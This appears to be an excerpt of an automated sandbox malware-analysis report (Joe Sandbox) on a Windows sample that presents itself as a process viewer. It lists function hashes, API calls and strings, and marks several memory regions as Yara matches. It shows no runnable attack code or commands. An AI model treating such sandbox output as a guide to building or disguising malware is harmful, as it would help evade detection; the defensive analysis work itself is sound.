                                    • Source File: 00000000.00000002.1674963737.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_530000_ExeFile (317).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: DR$Ou$fX
                                    • API String ID: 0-261343277
                                    • Opcode ID: 35011a71f1efeec21f41205fa19cc1100f716a3433215c3aa15e41254a7a0bd4
                                    • Instruction ID: 26e3e15e17c02de51cb6387fb84f0665eaf152113c6c90fd31b629eac5359920
                                    • Opcode Fuzzy Hash: 35011a71f1efeec21f41205fa19cc1100f716a3433215c3aa15e41254a7a0bd4
                                    • Instruction Fuzzy Hash: E18170B26083018FD728DFA5D98562EBBE4BBC4714F10092DF185D7394E7B4DA09CB56
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1674963737.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_530000_ExeFile (317).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: DR$Ou$m
                                    • API String ID: 0-902897619
                                    • Opcode ID: 3022d519a8e764b99babba5539b7764b19e81e0461fb9d543b1525caf33a4baa
                                    • Instruction ID: a97e565ea7281109aacdd6ef864bd38686118fa85cf9ec00323de72a000ef4ea
                                    • Opcode Fuzzy Hash: 3022d519a8e764b99babba5539b7764b19e81e0461fb9d543b1525caf33a4baa
                                    • Instruction Fuzzy Hash: 166192B2A087029FD714DF68C889A2EBBE4BBD4714F044D1DF49597294D7B8C909CF82
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1675028418.0000000000621000.00000020.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: true
                                    • Associated: 00000000.00000002.1675014188.0000000000620000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.1675045503.000000000062D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_620000_ExeFile (317).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: #CH.$#CH.$\au
                                    • API String ID: 0-122621526
                                    • Opcode ID: 35b0c4b4a6dbbe72a3082d9a67849c72e4d59433cb03268e85573b0fb539c703
                                    • Instruction ID: bece3c891867bf5a7b56d2f99a0774c17e143f034c2ded7f7bba600d5fd059a4
                                    • Opcode Fuzzy Hash: 35b0c4b4a6dbbe72a3082d9a67849c72e4d59433cb03268e85573b0fb539c703
                                    • Instruction Fuzzy Hash: AB410360B01A209FDB609B68BC91B7F6297AB94340F64083EB905DB381DF39DC058F52
                                    APIs
                                      • Part of subcall function 00410250: __wcstoi64.LIBCMT ref: 00410246
                                    • LdrFindResource_U.NTDLL(00400000,?,00000000), ref: 0040E988
                                    • LdrAccessResource.NTDLL(00400000,?,?,?), ref: 0040E9A6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1674807512.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1674790141.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674827448.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674845323.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674862376.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (317).jbxd
                                    Similarity
                                    • API ID: AccessFindResourceResource___wcstoi64
                                    • String ID:
                                    • API String ID: 2704380589-0
                                    • Opcode ID: d30840d2d2ead43e04db132799bc46682c7cb9d7c0ce2fb371b64fffc8a1bc2b
                                    • Instruction ID: 9141d4ce81294af721937c9894f8c7d92bdb9d8b2fa3c749db9c995ded6ab3af
                                    • Opcode Fuzzy Hash: d30840d2d2ead43e04db132799bc46682c7cb9d7c0ce2fb371b64fffc8a1bc2b
                                    • Instruction Fuzzy Hash: E511F8B5618301AFC304DF15D851BABBBE4BBC8744F408D2EF48997251D778E9488B96
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1674963737.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_530000_ExeFile (317).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: j>$_I
                                    • API String ID: 0-1249037685
                                    • Opcode ID: 29f85d3dca72841e53796d257874640ed7d86128da8aafbf7407b600ee0fd507
                                    • Instruction ID: 63600194a1a44117f8152635f89c2b60ecf4666ab59303c525198b62abada0a2
                                    • Opcode Fuzzy Hash: 29f85d3dca72841e53796d257874640ed7d86128da8aafbf7407b600ee0fd507
                                    • Instruction Fuzzy Hash: 13A1C5B1A083028FC758DF68D54562F7BE5BBC4704F00492DF586AB2A5E774DD09CB92
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1675028418.0000000000621000.00000020.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: true
                                    • Associated: 00000000.00000002.1675014188.0000000000620000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.1675045503.000000000062D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_620000_ExeFile (317).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: j>$_I
                                    • API String ID: 0-1249037685
                                    • Opcode ID: 0ce98c627a3ef8f56e32092e844db825a375563f34ee1da950837984c9b5538a
                                    • Instruction ID: 731ccbb6a5b7a052e16c4227f926a013ea3482d0098b8dccd73831301b26156c
                                    • Opcode Fuzzy Hash: 0ce98c627a3ef8f56e32092e844db825a375563f34ee1da950837984c9b5538a
                                    • Instruction Fuzzy Hash: 97A1CE71A08B128BC758DF68E84592BB6E6BBC4344F404A2DF5859B390E774DE09CF92
                                    APIs
                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00013DEE), ref: 00413E35
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1674807512.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1674790141.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674827448.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674845323.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674862376.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (317).jbxd
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled
                                    • String ID:
                                    • API String ID: 3192549508-0
                                    • Opcode ID: 235ea5c9bef6c299f322fcec842cddea2a7dec40c526a528a8edc706dd861580
                                    • Instruction ID: 123ae4dee83c8ecde87b64a495cd6158ef4cf236bc87e197f895214c45768a6d
                                    • Opcode Fuzzy Hash: 235ea5c9bef6c299f322fcec842cddea2a7dec40c526a528a8edc706dd861580
                                    • Instruction Fuzzy Hash: 8C9002B43521005647002B726C295C52D905A4C623B9144B1E409C5054DA554688951E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1674963737.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_530000_ExeFile (317).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: Z#
                                    • API String ID: 0-2750076499
                                    • Opcode ID: 48aefe013c6b0e285082495dbe214cf7901ff6248647a73da0f804c683cf7bf0
                                    • Instruction ID: c707882f417e53467f34dc89586bd175e0ca8e704a46f13a637e778071cf3db3
                                    • Opcode Fuzzy Hash: 48aefe013c6b0e285082495dbe214cf7901ff6248647a73da0f804c683cf7bf0
                                    • Instruction Fuzzy Hash: 13417E72A087019FC748EF64D94512EB7E1BFD5724F408C2DE4D98B264D7B89916CF42
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1675028418.0000000000621000.00000020.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: true
                                    • Associated: 00000000.00000002.1675014188.0000000000620000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.1675045503.000000000062D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_620000_ExeFile (317).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: Z#
                                    • API String ID: 0-2750076499
                                    • Opcode ID: 3ebd49d1241f56ccfebdee3b28654e4fc4fa710f834c4a33895a9e86659a60cb
                                    • Instruction ID: 3b837b6adac980887186f4367f199121eec9672b5918122d9a6df5e375e9b41e
                                    • Opcode Fuzzy Hash: 3ebd49d1241f56ccfebdee3b28654e4fc4fa710f834c4a33895a9e86659a60cb
                                    • Instruction Fuzzy Hash: 1B4179B16087119FC348EF24E84506AB7E2BFD4714F41CC2DE4EA8B360D7B899168F82
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1674963737.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_530000_ExeFile (317).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: G
                                    • API String ID: 0-2152773504
                                    • Opcode ID: 5eefff4cf2e22a7b35d1d0869e14a7a0ca1d29622391eb98c12b28d1863400ce
                                    • Instruction ID: 1145cf04f662233df7864fb4fe1586b7b748a6f0685fa76a52734dd12df83737
                                    • Opcode Fuzzy Hash: 5eefff4cf2e22a7b35d1d0869e14a7a0ca1d29622391eb98c12b28d1863400ce
                                    • Instruction Fuzzy Hash: 6641E2B15093968BD354DF14E18546BBBE0FB80715F404E5EF4A19A251E3B4DA4CCBA3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1675028418.0000000000621000.00000020.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: true
                                    • Associated: 00000000.00000002.1675014188.0000000000620000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.1675045503.000000000062D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_620000_ExeFile (317).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: G
                                    • API String ID: 0-2152773504
                                    • Opcode ID: 5eefff4cf2e22a7b35d1d0869e14a7a0ca1d29622391eb98c12b28d1863400ce
                                    • Instruction ID: e088dd71f3a3ff3c9326c5bd0de07955737d24614e515d7b90ab2c500c86bba5
                                    • Opcode Fuzzy Hash: 5eefff4cf2e22a7b35d1d0869e14a7a0ca1d29622391eb98c12b28d1863400ce
                                    • Instruction Fuzzy Hash: 9F41D2B19093A68BD314DF14E18546BB7F1FB90B14F404D5EF4A19A251E3B8DA4CCBA3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1674963737.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_530000_ExeFile (317).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 633a1300b885a53bfa161636d9103113250ac8edc966c0ff43162eb85c4b339e
                                    • Instruction ID: a6fb2837df0fe3924f00b27048a2142f68a03d4fbdda566cc3983501fb68d715
                                    • Opcode Fuzzy Hash: 633a1300b885a53bfa161636d9103113250ac8edc966c0ff43162eb85c4b339e
                                    • Instruction Fuzzy Hash: 2941E8B9A01209EFDB04CF94C5A4B9DBBB1FF88304F245599D8069B385D735EE52DB80
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1674963737.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_530000_ExeFile (317).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
                                    • Instruction ID: 3b2ba1daf2a24b609dfdf99f2baf03005f285be18165c922d09bea785151a2ef
                                    • Opcode Fuzzy Hash: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
                                    • Instruction Fuzzy Hash: 6C31A5366047468FCB10DF1CC490926BBE4FF89314F05596DEA9587352D334FA468B91
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1674963737.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_530000_ExeFile (317).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                    • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                    • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                    • Instruction Fuzzy Hash:
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1675028418.0000000000621000.00000020.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: true
                                    • Associated: 00000000.00000002.1675014188.0000000000620000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.1675045503.000000000062D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_620000_ExeFile (317).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                    • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                    • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                    • Instruction Fuzzy Hash:
                                    APIs
                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004109B8), ref: 00413A7F
                                    • __mtterm.LIBCMT ref: 00413A8B
                                      • Part of subcall function 004137C4: DecodePointer.KERNEL32(00000006,00413BED,?,004109B8), ref: 004137D5
                                      • Part of subcall function 004137C4: TlsFree.KERNEL32(00000004,00413BED,?,004109B8), ref: 004137EF
                                      • Part of subcall function 004137C4: DeleteCriticalSection.KERNEL32(00000000,00000000,76EF5810,?,00413BED,?,004109B8), ref: 00414742
                                      • Part of subcall function 004137C4: _free.LIBCMT ref: 00414745
                                      • Part of subcall function 004137C4: DeleteCriticalSection.KERNEL32(00000004,76EF5810,?,00413BED,?,004109B8), ref: 0041476C
                                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00413AA1
                                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00413AAE
                                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00413ABB
                                    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00413AC8
                                    • TlsAlloc.KERNEL32(?,004109B8), ref: 00413B18
                                    • TlsSetValue.KERNEL32(00000000,?,004109B8), ref: 00413B33
                                    • __init_pointers.LIBCMT ref: 00413B3D
                                    • EncodePointer.KERNEL32(?,004109B8), ref: 00413B4E
                                    • EncodePointer.KERNEL32(?,004109B8), ref: 00413B5B
                                    • EncodePointer.KERNEL32(?,004109B8), ref: 00413B68
                                    • EncodePointer.KERNEL32(?,004109B8), ref: 00413B75
                                    • DecodePointer.KERNEL32(00413948,?,004109B8), ref: 00413B96
                                    • __calloc_crt.LIBCMT ref: 00413BAB
                                    • DecodePointer.KERNEL32(00000000,?,004109B8), ref: 00413BC5
                                    • GetCurrentThreadId.KERNEL32 ref: 00413BD7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1674807512.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1674790141.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674827448.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674845323.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674862376.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (317).jbxd
                                    Similarity
                                    • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                    • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                    • API String ID: 3698121176-3819984048
                                    • Opcode ID: 7fa4eb56ef05f7034d1ff1bbb87a14009720894ebe7a7eebfb30a0a54c149666
                                    • Instruction ID: b88612f9e2fa8c258af8cfdc3785799afccaa31c7b0e2b814971bbd95b978274
                                    • Opcode Fuzzy Hash: 7fa4eb56ef05f7034d1ff1bbb87a14009720894ebe7a7eebfb30a0a54c149666
                                    • Instruction Fuzzy Hash: 9E31B370904215ABD710AFB9FD096E63FF0AB48765710843BE815D32B1E7799986CF8C
                                    APIs
                                    • PostQuitMessage.USER32(00000000), ref: 0040F8A1
                                    • ShowWindow.USER32(00000000,00000001), ref: 0040F8BA
                                    • SendMessageW.USER32(00000000,0000100C,000000FF,00000002), ref: 0040F901
                                    • wsprintfW.USER32 ref: 0040F92B
                                    • MessageBoxW.USER32(00000000,System process can't been terminated!,Windows Notification,00000000), ref: 0040F956
                                    • SendMessageW.USER32(00000000,0000100C,00000000,00000002), ref: 0040F96B
                                    • DefWindowProcW.USER32(?,?,?,?), ref: 0040FA5F
                                    Strings
                                    • System process can't been terminated!, xrefs: 0040F950
                                    • View All Processes, xrefs: 0040F991
                                    • iPos=%d, xrefs: 0040F925
                                    • Windows Notification, xrefs: 0040F94B, 0040F9F4
                                    • View My Processes, xrefs: 0040F9AC
                                    • The application name can't be found. Please make sure whether the name is right!, xrefs: 0040F9F9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1674807512.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1674790141.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674827448.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674845323.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674862376.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (317).jbxd
                                    Similarity
                                    • API ID: Message$SendWindow$PostProcQuitShowwsprintf
                                    • String ID: System process can't been terminated!$The application name can't be found. Please make sure whether the name is right!$View All Processes$View My Processes$Windows Notification$iPos=%d
                                    • API String ID: 4014529712-140908480
                                    • Opcode ID: 746f52bec132f143904a4d114beca3bddeb3b89a76c870e33d9bf59fe38b171c
                                    • Instruction ID: b9e1b8610fbedb75af30f79fd81a6c46aadfc3012c35c013c55d51da3f45cb0f
                                    • Opcode Fuzzy Hash: 746f52bec132f143904a4d114beca3bddeb3b89a76c870e33d9bf59fe38b171c
                                    • Instruction Fuzzy Hash: 8061E7B2610201FBD734AB64EC59BE733A4A788300F14893BE556B76D0E738AC4D8B5D
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1674807512.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1674790141.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674827448.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674845323.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674862376.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (317).jbxd
                                    Similarity
                                    • API ID: wsprintf$MessageSend
                                    • String ID: Description$Memory$Process ID$Process Name$User Name$d
                                    • API String ID: 12235790-2901759098
                                    • Opcode ID: e5dbcb87020978b1e542e2b3685ea65f06ad9b3c102300a686b14875117c4917
                                    • Instruction ID: 279726ffbfae14383190c6c753e1979e50f314c5c8a28d2d91e27df4f51d6de9
                                    • Opcode Fuzzy Hash: e5dbcb87020978b1e542e2b3685ea65f06ad9b3c102300a686b14875117c4917
                                    • Instruction Fuzzy Hash: 772161B1A48340AFC360CF65C895B9BBBE4EB89704F504D2FF08893240D7B99945CF9A
                                    APIs
                                    • OpenProcessToken.ADVAPI32 ref: 0040E2D4
                                    • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),?,0000012C,?), ref: 0040E2FF
                                    • CloseHandle.KERNEL32(?), ref: 0040E35E
                                    • wsprintfW.USER32 ref: 0040E3AE
                                    • wsprintfW.USER32 ref: 0040E3CD
                                    • wsprintfW.USER32 ref: 0040E3E4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1674807512.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1674790141.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674827448.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674845323.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674862376.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (317).jbxd
                                    Similarity
                                    • API ID: wsprintf$Token$CloseHandleInformationOpenProcess
                                    • String ID: %s %s$GetTokenInformation$LookupAccountSid$OpenProcessToken
                                    • API String ID: 2594950064-3173787032
                                    • Opcode ID: e7827d6f24756a15ea7fd67e0d12da55e7482696f9941f31bcf56fd5c500a86e
                                    • Instruction ID: affa38bc1eb5f0fd5749b03f1417e1fb464e194ef1bd6555a84b7e3c49497071
                                    • Opcode Fuzzy Hash: e7827d6f24756a15ea7fd67e0d12da55e7482696f9941f31bcf56fd5c500a86e
                                    • Instruction Fuzzy Hash: C741A371508301ABE720CF25C845BEB77E8ABC8744F044D2EF88993291E778A955CB9A
                                    APIs
                                    • QueryFullProcessImageNameW.KERNEL32 ref: 0040E4F3
                                      • Part of subcall function 0040E170: GetLastError.KERNEL32 ref: 0040E18D
                                      • Part of subcall function 0040E170: FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,00000100,00000100,00000000), ref: 0040E1AE
                                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 0040E536
                                    • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 0040E577
                                    • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,?,?,00000000,00000000), ref: 0040E594
                                    • wsprintfW.USER32 ref: 0040E5C3
                                    • VerQueryValueW.VERSION(00000000,?,?,?,?,?,00000000,00000000), ref: 0040E5DC
                                    • _wcsncpy.LIBCMT ref: 0040E652
                                    Strings
                                    • \VarFileInfo\Translation, xrefs: 0040E58E
                                    • \StringFileInfo\%04X%04X\FileDescription, xrefs: 0040E5BD
                                    • QueryFullProcessImageName, xrefs: 0040E4FD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1674807512.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1674790141.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674827448.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674845323.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674862376.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (317).jbxd
                                    Similarity
                                    • API ID: Query$FileInfoValueVersion$ErrorFormatFullImageLastMessageNameProcessSize_wcsncpywsprintf
                                    • String ID: QueryFullProcessImageName$\StringFileInfo\%04X%04X\FileDescription$\VarFileInfo\Translation
                                    • API String ID: 3020331544-1601958718
                                    • Opcode ID: 717397a408e92381d84000f1c6290437c4a0c9b5022d2bdde5cfeda8ea2e2501
                                    • Instruction ID: eaa9ef88b69fa93d3b711ac30ff6fc1bf7e9ecaf4ef91606315cd00198441a56
                                    • Opcode Fuzzy Hash: 717397a408e92381d84000f1c6290437c4a0c9b5022d2bdde5cfeda8ea2e2501
                                    • Instruction Fuzzy Hash: F14119725043016BD324EB22DC45FBB73E8AF98744F444D3EF849922D1EA79D908C76A
                                    APIs
                                    • SetLastError.KERNEL32(0000007F), ref: 006414DB
                                    • SetLastError.KERNEL32(0000007F), ref: 00641507
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1675098007.0000000000641000.00000020.00001000.00020000.00000000.sdmp, Offset: 00641000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_641000_ExeFile (317).jbxd
                                    Similarity
                                    • API ID: ErrorLast
                                    • String ID:
                                    • API String ID: 1452528299-0
                                    • Opcode ID: ee6dd14368917d7ab4948f7db8572ab93c348c39554746bfab742a4364e1bf46
                                    • Instruction ID: abe2c12f5ed84ff1e0606abb49b906a599e30327c0bdbe6c758261a64d120534
                                    • Opcode Fuzzy Hash: ee6dd14368917d7ab4948f7db8572ab93c348c39554746bfab742a4364e1bf46
                                    • Instruction Fuzzy Hash: 5B71F574E00109EFDB08DF98C990BADBBB2FF59304F258598E516AB351D734EA81DB90
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1674807512.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1674790141.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674827448.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674845323.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674862376.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (317).jbxd
                                    Similarity
                                    • API ID: CloseHandle$CreateProcess__wcsdup_memset
                                    • String ID: D
                                    • API String ID: 169418676-2746444292
                                    • Opcode ID: 85112b14f432fe8e92b2228129b8667fad4ace48c94bb840cbc2fdde4ee473de
                                    • Instruction ID: 0b47bd45ec23967565d9eba1f3cace27cbad009f0a552ed0d82179670a4d4d1e
                                    • Opcode Fuzzy Hash: 85112b14f432fe8e92b2228129b8667fad4ace48c94bb840cbc2fdde4ee473de
                                    • Instruction Fuzzy Hash: DB0167B15043006BD310EF69CD41B8B7BE9AF88B40F40891EF659D7240E7B9D9448B97
                                    APIs
                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0041BDC8,00000008,00413909,00000000,00000000,?,?,00413936,?,00410F75,?,?,00412311,?,?), ref: 00413812
                                    • __lock.LIBCMT ref: 00413846
                                      • Part of subcall function 00414855: __mtinitlocknum.LIBCMT ref: 0041486B
                                      • Part of subcall function 00414855: __amsg_exit.LIBCMT ref: 00414877
                                      • Part of subcall function 00414855: EnterCriticalSection.KERNEL32(?,?,?,0041384B,0000000D), ref: 0041487F
                                    • InterlockedIncrement.KERNEL32(0041D6E0), ref: 00413853
                                    • __lock.LIBCMT ref: 00413867
                                    • ___addlocaleref.LIBCMT ref: 00413885
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1674807512.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1674790141.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674827448.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674845323.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674862376.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (317).jbxd
                                    Similarity
                                    • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                    • String ID: KERNEL32.DLL
                                    • API String ID: 637971194-2576044830
